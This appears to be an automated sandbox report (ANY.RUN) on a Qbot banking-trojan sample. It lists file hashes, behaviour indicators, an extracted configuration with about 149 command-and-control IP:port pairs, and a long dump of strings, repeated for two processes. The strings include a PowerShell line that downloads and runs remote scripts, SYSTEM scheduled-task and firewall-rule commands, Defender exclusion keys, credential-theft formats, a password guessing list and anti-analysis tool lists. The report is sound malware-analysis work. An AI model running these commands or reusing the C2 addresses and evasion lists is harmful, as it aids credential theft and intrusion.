File name:

sample_packed.exe

Full analysis: https://app.any.run/tasks/fd70f799-4ab0-4941-9663-55b076f017f7
Verdict: Malicious activity
Threats:

Qbot is a banking Trojan — a malware designed to collect banking information from victims. Qbot targets organizations mostly in the US. It is equipped with various sophisticated evasion and info-stealing functions and worm-like functionality, and a strong persistence mechanism.

Malware Trends Tracker     >>>
Analysis date: November 04, 2023, 00:30:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
qbot
UxCryptor
Indicators:
MIME: application/x-dosexec
File info: MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
MD5:

E1205EF15DA2DBECB57B40CE43ABE0F8

SHA1:

8525F7A7218923302F97F4EB3865A1E20C271521

SHA256:

A5F9EFBD8EB8DBADAEAD5328B9E1F3ACE32E1B92F2772048CAC6D455B8810D4C

SSDEEP:

12288:Y0NTexXbrRNp76MQ7Jvl6on3CSCgJ6ce+V280anY:Yg6BrRNZ6M2Jvl6on3CNgJiu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • QBOT has been detected (YARA)

      • sample_packed.exe (PID: 3216)
      • sample_packed.exe (PID: 2912)
      • sample_packed.exe (PID: 3980)
      • sample_packed.exe (PID: 3956)
      • sample_packed.exe (PID: 4048)
      • sample_packed.exe (PID: 3548)
      • sample_packed.exe (PID: 4076)
      • sample_packed.exe (PID: 4088)

  • SUSPICIOUS

    • Application launched itself

      • sample_packed.exe (PID: 3216)
      • sample_packed.exe (PID: 3980)
      • sample_packed.exe (PID: 4076)
      • sample_packed.exe (PID: 3956)

  • INFO

    • Checks supported languages

      • sample_packed.exe (PID: 3216)
      • sample_packed.exe (PID: 2912)
      • sample_packed.exe (PID: 3980)
      • sample_packed.exe (PID: 4076)
      • sample_packed.exe (PID: 3956)
      • sample_packed.exe (PID: 4048)
      • sample_packed.exe (PID: 4088)
      • sample_packed.exe (PID: 3548)

    • Reads the computer name

      • sample_packed.exe (PID: 3216)
      • sample_packed.exe (PID: 2912)
      • sample_packed.exe (PID: 3980)
      • sample_packed.exe (PID: 4076)
      • sample_packed.exe (PID: 3956)
      • sample_packed.exe (PID: 4048)
      • sample_packed.exe (PID: 4088)
      • sample_packed.exe (PID: 3548)

    • Manual execution by a user

      • verclsid.exe (PID: 3640)
      • sample_packed.exe (PID: 3980)
      • sample_packed.exe (PID: 3956)
      • sample_packed.exe (PID: 4076)
      • cmd.exe (PID: 3612)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Qbot

(PID) Process(3216) sample_packed.exe
Botnetspx133
Campaign1591267427
Version324.142
C2 (149)1.40.42.4:443
100.38.123.22:443
104.221.4.11:2222
104.50.141.139:995
105.184.48.142:443
108.27.217.44:443
108.31.92.113:443
108.51.73.186:443
108.58.9.238:993
108.58.9.238:995
128.234.46.27:443
134.0.196.46:995
137.103.143.124:443
140.82.21.191:443
142.129.227.86:443
151.73.126.205:443
173.172.205.216:443
173.175.29.210:443
173.187.169.73:443
173.22.120.11:2222
173.245.152.231:443
173.49.122.160:995
173.79.220.156:443
174.34.67.106:2222
175.111.128.234:443
176.193.41.32:2222
184.180.157.203:2222
184.98.104.7:995
185.246.9.69:995
188.192.75.8:443
188.192.75.8:995
188.27.71.163:443
189.140.112.184:443
189.159.133.162:995
197.165.178.49:443
2.88.183.192:443
203.33.139.134:443
207.162.184.228:443
207.255.161.8:2078
207.255.161.8:2087
207.255.161.8:2222
207.255.161.8:32102
207.255.161.8:32103
207.255.18.67:443
216.163.4.91:443
216.201.162.158:995
24.10.42.174:443
24.152.219.253:995
24.201.79.208:2078
24.226.137.154:443
24.42.14.241:443
24.43.22.220:443
24.43.22.220:995
24.46.40.189:2222
24.99.180.247:443
47.136.224.60:443
47.146.169.85:443
47.152.210.233:443
47.153.115.154:443
47.153.115.154:995
47.201.1.210:443
47.205.231.60:443
47.35.182.97:443
47.40.244.237:443
49.144.84.21:443
49.191.4.245:443
5.12.114.96:443
5.13.99.38:995
5.14.251.226:443
50.244.112.106:443
50.244.112.10:443
50.247.230.33:995
50.29.181.193:995
59.124.10.133:443
62.121.123.57:443
62.38.111.70:2222
64.121.114.87:443
64.19.74.29:995
65.131.83.170:995
65.24.76.114:443
66.222.88.126:995
66.26.160.37:443
67.131.59.17:443
67.209.195.198:3389
67.5.28.72:465
67.83.54.76:2222
68.174.15.223:443
69.245.144.167:443
69.28.222.54:443
69.40.17.142:443
69.92.54.95:995
70.174.3.241:443
70.183.127.6:995
71.163.225.75:443
71.185.60.227:443
71.187.170.235:443
71.77.231.251:443
71.80.66.107:443
71.88.104.107:995
72.16.212.108:465
72.177.157.217:995
72.183.129.56:443
72.190.101.70:443
72.204.242.138:2078
72.204.242.138:443
72.209.191.27:443
72.240.245.253:443
72.28.255.159:995
72.29.181.77:2078
72.69.180.183:61202
73.94.229.115:443
74.215.201.122:443
74.56.167.31:443
75.183.171.155:3389
75.81.25.223:443
75.87.161.32:995
76.15.41.32:443
76.170.77.99:443
76.187.8.160:443
77.237.181.212:995
78.96.192.26:443
78.97.145.242:443
79.113.219.121:443
79.115.128.221:443
79.117.161.67:21
79.119.67.149:443
80.195.103.146:2222
80.240.26.178:443
81.103.144.77:443
81.133.234.36:2222
82.127.193.151:2222
82.76.239.193:443
85.121.42.12:995
85.186.141.62:995
86.123.106.54:443
86.126.97.183:2222
89.44.195.186:2222
93.113.90.128:443
96.18.240.158:443
96.35.170.82:2222
96.37.137.42:443
96.41.93.96:443
96.56.237.174:993
97.93.211.17:443
98.114.185.3:443
98.115.138.61:443
98.118.156.172:443
98.219.77.197:443
98.32.60.217:443
SaltjHxastDcds)oMc=jvh7wdUhxcsdt2
Strings (456)/F
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
/ru ""
[begin]
[end]
cookie=[%s]
data=[%s]
exe=[%s] cmdline=[%s] pid=[%u] username=[%s]
ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]
host=[%s:%u] user=[%s] pass=[%s]
referer=[%s]
url=[%s]
url=[%s] data=[%s]
url=[%s] lb=[%s] data=[%s]
url=[%s] user=[%s] pass=[%s]
"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u
"%s\system32\schtasks.exe" /DELETE /F /TN %s
"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S
%%%BOT_NICK%%%
%02u.%02u.%02u-%02u/%02u/%04u
%BOTID%
%BOT_COMPUTERNAME%
%BOT_MACHINE_UUID%
%BOT_USERDOMAIN%
%BOT_USERNAME%
%BOT_VENDOR_ID%
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe
%SystemRoot%\SysWOW64\explorer.exe
%SystemRoot%\SysWOW64\mobsync.exe
%SystemRoot%\SysWOW64\xwizard.exe
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\System32\xwizard.exe
%SystemRoot%\explorer.exe
%s "$windowsupdate = \"%s\"; & $windowsupdate"
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%s%s/dupinst.php?n=%s&bg=%s&r=%u
%s\%s.vbs
%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"
%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%u.%s.%s.%08x
*/*
.cfg
.dat
.dll
.exe
.lnk
/bot_serv
/t3
000
1.nvprivateoffice.info
123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,6...
1234567890
2
23.49.13.33:7000
3
307
308
309
310
311
ADMIN$
ALLUSERSPROFILE
AdjustTokenPrivileges
Administrator
AllocateAndInitializeSid
AvastSvc.exe
ByteFence.exe
C$
C:\\INTERNAL\\__empty
CWSandbox
CertAddCRLContextToStore
CertAddCTLContextToStore
CertAddCertificateContextToStore
CertCloseStore
CertCreateCertificateChainEngine
CertDuplicateCRLContext
CertEnumCertificatesInStore
CertEnumSystemStore
CertFreeCRLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCertificateChain
CertGetEnhancedKeyUsage
CertGetNameStringW
CertOpenStore
CertSetCertificateContextProperty
CloseHandle
CloseServiceHandle
Content-Type: application/x-www-form-urlencoded
CreateDirectoryA
CreateFileA
CreateFileW
CreateProcessA
CreateProcessInternalW
CreateProcessW
CreateRemoteThread
CreateServiceW
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CredEnumerateA
CredFree
CryptAcquireCertificatePrivateKey
CryptEnumOIDInfo
CryptFindOIDInfo
CryptUnprotectData
DefWindowProcA
DeleteFileA
DeleteService
DeleteServiceW
DeleteUrlCacheEntryW
DestroyWindow
DispatchMessageA
DnsQuery_A
DnsQuery_W
DynamicCodePolicy
EnumWindows
ExpandEnvironmentStringsA
Fiddler.exe;samp1e.exe;sample.exe;runsample.exe;lordpe.exe;regshot.exe;Autoruns.exe;dsniff.exe;VBoxTray.exe;HashMyFiles.exe;ProcessHacker.exe;Procmon.exe;Procmon64.exe;netmon.exe;vmtoolsd.exe;vm3dservice.exe;VGAuthService.exe;pr0c3xp.exe;ProcessHacker.exe;CFF Explorer.exe;dumpcap.exe;Wireshark.exe;i...
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FindWindowA
FreeSid
FtpDeleteFileA
FtpGetFileA
FtpOpenFileA
GenuineIntel
GetClipboardData
GetCurrentDirectoryA
GetCurrentThreadId
GetForegroundWindow
GetMessageA
GetMessageW
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetUrlCacheEntryInfoW
GetVolumeInformationA
Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}
HOURLY /mo 5
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
IPC$
Initializing database...
InterlockedCompareExchange
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetGetCookieA
InternetGetCookieExA
InternetGetLastResponseInfoA
InternetOpenA
InternetOpenUrlA
InternetQueryDataAvailable
InternetQueryOptionA
InternetQueryOptionW
InternetReadFile
InternetReadFileExA
InternetSetOptionA
InternetSetStatusCallback
InternetWriteFile
LdrGetProcedureAddress
LdrLoadDll
LoadLibraryA
LoadResource
LocalFree
LookupAccountSidA
LookupAccountSidW
MBAMService.exe;mbamgui.exe
MessageBoxA
Microsoft
MicrosoftEdge.exe
Module32First
Module32Next
MoveFileA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
MsMpEng.exe
NAT-PMP %u tcp
NetApiBufferFree
NetGetDCName
NetShareEnum
NetUserEnum
NetWkstaGetInfo
NtAllocateVirtualMemory
NtClose
NtCreateSection
NtFreeVirtualMemory
NtGetContextThread
NtMapViewOfSection
NtProtectVirtualMemory
NtQueryInformationProcess
NtQueryVirtualMemory
NtReadVirtualMemory
NtSetContextThread
NtUnmapViewOfSection
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
NtWriteVirtualMemory
ObtainUserAgentString
OpenProcess
OpenSCManagerW
OpenThread
PFXExportCertStore
PR_Close
PR_GetError
PR_GetNameForIdentity
PR_OpenTCPSocket
PR_Read
PR_SetError
PR_Write
PStoreCreateInstance
PathCombineA
PathCombineW
PathMatchSpecA
PathMatchSpecW
PathUnquoteSpacesW
PeekMessageA
PeekMessageW
PostMessageA
PostQuitMessage
Process32First
Process32Next
ProfileImagePath
QEMU
QueryFullProcessImageNameW
Query_Main
RapportGP.DLL
ReadFile
ReadProcessMemory
Red Hat VirtIO
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
RegSetValueExA
RegisterClassExA
RtlGetVersion
RtlNtStatusToDosError
RtlSetLastWin32Error
SAVAdminService.exe;SavService.exe
SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\SpyNet
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
SbieDll.dll
Self test FAILED!!!
Self test OK.
SendMessageA
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'") For Each objFile in colFiles objFile.Copy("%s") Next
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul)
SetCurrentDirectoryA
SetEndOfFile
SetEntriesInAclA
SetFilePointer
SetLastError
SetNamedSecurityInfoA
ShellExecuteA
ShowWindow
SizeofResource
SpyNetReporting
StackWalk64
StartServiceW
StrCmpIW
StrCmpNIA
StrStrIA
StrStrIW
StrStrW
StrTrimW
SubmitSamplesConsent
TranslateMessage
UnregisterClassA
UpdateWindow
VBoxGuest
VBoxVideo
VMAUDIO
VMware Accelerated
VMware Pointing
VMware Replay
VMware SCSI
VMware SVGA
VMware VMaudio
VMware Vista
VMware server memory
Virtual HD
VirtualAllocEx
VirtualFreeEx
VirtualProtect
VirtualProtectEx
WBJ_IGNORE
WEEKLY /D TUE,WED,THU /ST 12:00:00
WNetAddConnection2W
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
WRSA.exe
WSAConnect
WSAGetLastError
WSASend
WSASetLastError
WScript.Sleep %u Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul) WSCript.Sleep 2000 Set fso = CreateObject("Scripting.FileSystemObject")...
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSQueryUserToken
WaitForSingleObject
Windows10 Edge HttpQueryInfo Bug!!!
WriteFile
WriteProcessMemory
ZwQueryInformationThread
ZwResumeThread
\sf2.dll
_decrypted.file;MultiAnalysis_v
aabcdeefghiijklmnoopqrstuuvwxyyz
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
abc
abcdefghijklmnopqrstuvwxyz
administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator
advapi32.dll
ansfltr
application/x-shockwave-flash
artifact.exe
aswhooka.dll
aswhookx.dll
avcuf32.dll
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
avp.exe;kavtray.exe
bdagent.exe;vsserv.exe;vsservppl.exe
c1
c:\hiberfil.sysss
cashmanagementconnectionstring
ccSvcHst.exe
chrome.dll
chrome_child.dll
cmd /c schtasks.exe /Query > "%s"
cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\" sudhfdus
cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"
cmd=1&msg=%s&ports=
comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn...
connect
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
crypt32.dll
cryptui.dll
cscript.exe
data_after
data_before
data_end
data_inject
dbghelp.dll
dnsapi.dll
egui.exe;ekrn.exe
error res='%s' err=%d len=%u
exclude_url
explorer.exe
f1
firefox.exe
fmon.exe
fshoster32.exe
h1
h2
h3
https://
https://cdn.speedof.me/sample4096k.bin?r=0.%u
https://en.wikipedia.org/static/apple-touch/wikipedia.png
i1
i2
i3
i4
ignore_url
image/gif
image/jpeg
image/pjpeg
ivm-inject.dll
jHxastDcds)oMc=jvh7wdUhxcsdt2
k1
kb
kernel32.dll
m1
mcshield.exe
metsvc-server.exe
mlwr_smpl
mpr.dll
netapi32.dll
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes
netsh firewall set allowedprogram "%s" %s ENABLE
netteller.com
npl
npq
nspr4.dll
nss3.dll
ntdll.dll
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%s'"
pstorec.dll
qbot_conf_path='%S' username='%S'
qbot_run_mutex='%s' username='%S'
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
rsabase.dll
rsaenh.dll
s2
sample
sbtisht
send
set_url
shell32.dll
shlwapi.dll
siteadvisor.com;avgthreatlabs.com;safeweb.norton.com
snxhk_border_mywnd
srootkit
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe
u1
urlmon.dll
user32.dll
vSockets
vkise.exe;isesrv.exe;cmdagent.exe
vm3dmp
vmacthlp.exe
vmdebug
vmnat.exe
vmrawdsk
vmscsi
vmtoolsd.exe
vmx_svga
vmxnet
w1
wbj.go
webinjects.cb
windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe
windump.exe
wininet.dll
wpcap.dll
ws2_32.dll
wtsapi32.dll
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
(PID) Process(2912) sample_packed.exe
Botnetspx133
Campaign1591267427
Version324.142
C2 (149)1.40.42.4:443
100.38.123.22:443
104.221.4.11:2222
104.50.141.139:995
105.184.48.142:443
108.27.217.44:443
108.31.92.113:443
108.51.73.186:443
108.58.9.238:993
108.58.9.238:995
128.234.46.27:443
134.0.196.46:995
137.103.143.124:443
140.82.21.191:443
142.129.227.86:443
151.73.126.205:443
173.172.205.216:443
173.175.29.210:443
173.187.169.73:443
173.22.120.11:2222
173.245.152.231:443
173.49.122.160:995
173.79.220.156:443
174.34.67.106:2222
175.111.128.234:443
176.193.41.32:2222
184.180.157.203:2222
184.98.104.7:995
185.246.9.69:995
188.192.75.8:443
188.192.75.8:995
188.27.71.163:443
189.140.112.184:443
189.159.133.162:995
197.165.178.49:443
2.88.183.192:443
203.33.139.134:443
207.162.184.228:443
207.255.161.8:2078
207.255.161.8:2087
207.255.161.8:2222
207.255.161.8:32102
207.255.161.8:32103
207.255.18.67:443
216.163.4.91:443
216.201.162.158:995
24.10.42.174:443
24.152.219.253:995
24.201.79.208:2078
24.226.137.154:443
24.42.14.241:443
24.43.22.220:443
24.43.22.220:995
24.46.40.189:2222
24.99.180.247:443
47.136.224.60:443
47.146.169.85:443
47.152.210.233:443
47.153.115.154:443
47.153.115.154:995
47.201.1.210:443
47.205.231.60:443
47.35.182.97:443
47.40.244.237:443
49.144.84.21:443
49.191.4.245:443
5.12.114.96:443
5.13.99.38:995
5.14.251.226:443
50.244.112.106:443
50.244.112.10:443
50.247.230.33:995
50.29.181.193:995
59.124.10.133:443
62.121.123.57:443
62.38.111.70:2222
64.121.114.87:443
64.19.74.29:995
65.131.83.170:995
65.24.76.114:443
66.222.88.126:995
66.26.160.37:443
67.131.59.17:443
67.209.195.198:3389
67.5.28.72:465
67.83.54.76:2222
68.174.15.223:443
69.245.144.167:443
69.28.222.54:443
69.40.17.142:443
69.92.54.95:995
70.174.3.241:443
70.183.127.6:995
71.163.225.75:443
71.185.60.227:443
71.187.170.235:443
71.77.231.251:443
71.80.66.107:443
71.88.104.107:995
72.16.212.108:465
72.177.157.217:995
72.183.129.56:443
72.190.101.70:443
72.204.242.138:2078
72.204.242.138:443
72.209.191.27:443
72.240.245.253:443
72.28.255.159:995
72.29.181.77:2078
72.69.180.183:61202
73.94.229.115:443
74.215.201.122:443
74.56.167.31:443
75.183.171.155:3389
75.81.25.223:443
75.87.161.32:995
76.15.41.32:443
76.170.77.99:443
76.187.8.160:443
77.237.181.212:995
78.96.192.26:443
78.97.145.242:443
79.113.219.121:443
79.115.128.221:443
79.117.161.67:21
79.119.67.149:443
80.195.103.146:2222
80.240.26.178:443
81.103.144.77:443
81.133.234.36:2222
82.127.193.151:2222
82.76.239.193:443
85.121.42.12:995
85.186.141.62:995
86.123.106.54:443
86.126.97.183:2222
89.44.195.186:2222
93.113.90.128:443
96.18.240.158:443
96.35.170.82:2222
96.37.137.42:443
96.41.93.96:443
96.56.237.174:993
97.93.211.17:443
98.114.185.3:443
98.115.138.61:443
98.118.156.172:443
98.219.77.197:443
98.32.60.217:443
SaltjHxastDcds)oMc=jvh7wdUhxcsdt2
Strings (456)/F
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
/ru ""
[begin]
[end]
cookie=[%s]
data=[%s]
exe=[%s] cmdline=[%s] pid=[%u] username=[%s]
ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]
host=[%s:%u] user=[%s] pass=[%s]
referer=[%s]
url=[%s]
url=[%s] data=[%s]
url=[%s] lb=[%s] data=[%s]
url=[%s] user=[%s] pass=[%s]
"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u
"%s\system32\schtasks.exe" /DELETE /F /TN %s
"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S
%%%BOT_NICK%%%
%02u.%02u.%02u-%02u/%02u/%04u
%BOTID%
%BOT_COMPUTERNAME%
%BOT_MACHINE_UUID%
%BOT_USERDOMAIN%
%BOT_USERNAME%
%BOT_VENDOR_ID%
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe
%SystemRoot%\SysWOW64\explorer.exe
%SystemRoot%\SysWOW64\mobsync.exe
%SystemRoot%\SysWOW64\xwizard.exe
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\System32\xwizard.exe
%SystemRoot%\explorer.exe
%s "$windowsupdate = \"%s\"; & $windowsupdate"
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%s%s/dupinst.php?n=%s&bg=%s&r=%u
%s\%s.vbs
%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"
%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%u.%s.%s.%08x
*/*
.cfg
.dat
.dll
.exe
.lnk
/bot_serv
/t3
000
1.nvprivateoffice.info
123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,6...
1234567890
2
23.49.13.33:7000
3
307
308
309
310
311
ADMIN$
ALLUSERSPROFILE
AdjustTokenPrivileges
Administrator
AllocateAndInitializeSid
AvastSvc.exe
ByteFence.exe
C$
C:\\INTERNAL\\__empty
CWSandbox
CertAddCRLContextToStore
CertAddCTLContextToStore
CertAddCertificateContextToStore
CertCloseStore
CertCreateCertificateChainEngine
CertDuplicateCRLContext
CertEnumCertificatesInStore
CertEnumSystemStore
CertFreeCRLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCertificateChain
CertGetEnhancedKeyUsage
CertGetNameStringW
CertOpenStore
CertSetCertificateContextProperty
CloseHandle
CloseServiceHandle
Content-Type: application/x-www-form-urlencoded
CreateDirectoryA
CreateFileA
CreateFileW
CreateProcessA
CreateProcessInternalW
CreateProcessW
CreateRemoteThread
CreateServiceW
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CredEnumerateA
CredFree
CryptAcquireCertificatePrivateKey
CryptEnumOIDInfo
CryptFindOIDInfo
CryptUnprotectData
DefWindowProcA
DeleteFileA
DeleteService
DeleteServiceW
DeleteUrlCacheEntryW
DestroyWindow
DispatchMessageA
DnsQuery_A
DnsQuery_W
DynamicCodePolicy
EnumWindows
ExpandEnvironmentStringsA
Fiddler.exe;samp1e.exe;sample.exe;runsample.exe;lordpe.exe;regshot.exe;Autoruns.exe;dsniff.exe;VBoxTray.exe;HashMyFiles.exe;ProcessHacker.exe;Procmon.exe;Procmon64.exe;netmon.exe;vmtoolsd.exe;vm3dservice.exe;VGAuthService.exe;pr0c3xp.exe;ProcessHacker.exe;CFF Explorer.exe;dumpcap.exe;Wireshark.exe;i...
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FindWindowA
FreeSid
FtpDeleteFileA
FtpGetFileA
FtpOpenFileA
GenuineIntel
GetClipboardData
GetCurrentDirectoryA
GetCurrentThreadId
GetForegroundWindow
GetMessageA
GetMessageW
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetUrlCacheEntryInfoW
GetVolumeInformationA
Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}
HOURLY /mo 5
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
IPC$
Initializing database...
InterlockedCompareExchange
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetGetCookieA
InternetGetCookieExA
InternetGetLastResponseInfoA
InternetOpenA
InternetOpenUrlA
InternetQueryDataAvailable
InternetQueryOptionA
InternetQueryOptionW
InternetReadFile
InternetReadFileExA
InternetSetOptionA
InternetSetStatusCallback
InternetWriteFile
LdrGetProcedureAddress
LdrLoadDll
LoadLibraryA
LoadResource
LocalFree
LookupAccountSidA
LookupAccountSidW
MBAMService.exe;mbamgui.exe
MessageBoxA
Microsoft
MicrosoftEdge.exe
Module32First
Module32Next
MoveFileA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
MsMpEng.exe
NAT-PMP %u tcp
NetApiBufferFree
NetGetDCName
NetShareEnum
NetUserEnum
NetWkstaGetInfo
NtAllocateVirtualMemory
NtClose
NtCreateSection
NtFreeVirtualMemory
NtGetContextThread
NtMapViewOfSection
NtProtectVirtualMemory
NtQueryInformationProcess
NtQueryVirtualMemory
NtReadVirtualMemory
NtSetContextThread
NtUnmapViewOfSection
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
NtWriteVirtualMemory
ObtainUserAgentString
OpenProcess
OpenSCManagerW
OpenThread
PFXExportCertStore
PR_Close
PR_GetError
PR_GetNameForIdentity
PR_OpenTCPSocket
PR_Read
PR_SetError
PR_Write
PStoreCreateInstance
PathCombineA
PathCombineW
PathMatchSpecA
PathMatchSpecW
PathUnquoteSpacesW
PeekMessageA
PeekMessageW
PostMessageA
PostQuitMessage
Process32First
Process32Next
ProfileImagePath
QEMU
QueryFullProcessImageNameW
Query_Main
RapportGP.DLL
ReadFile
ReadProcessMemory
Red Hat VirtIO
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
RegSetValueExA
RegisterClassExA
RtlGetVersion
RtlNtStatusToDosError
RtlSetLastWin32Error
SAVAdminService.exe;SavService.exe
SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\SpyNet
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
SbieDll.dll
Self test FAILED!!!
Self test OK.
SendMessageA
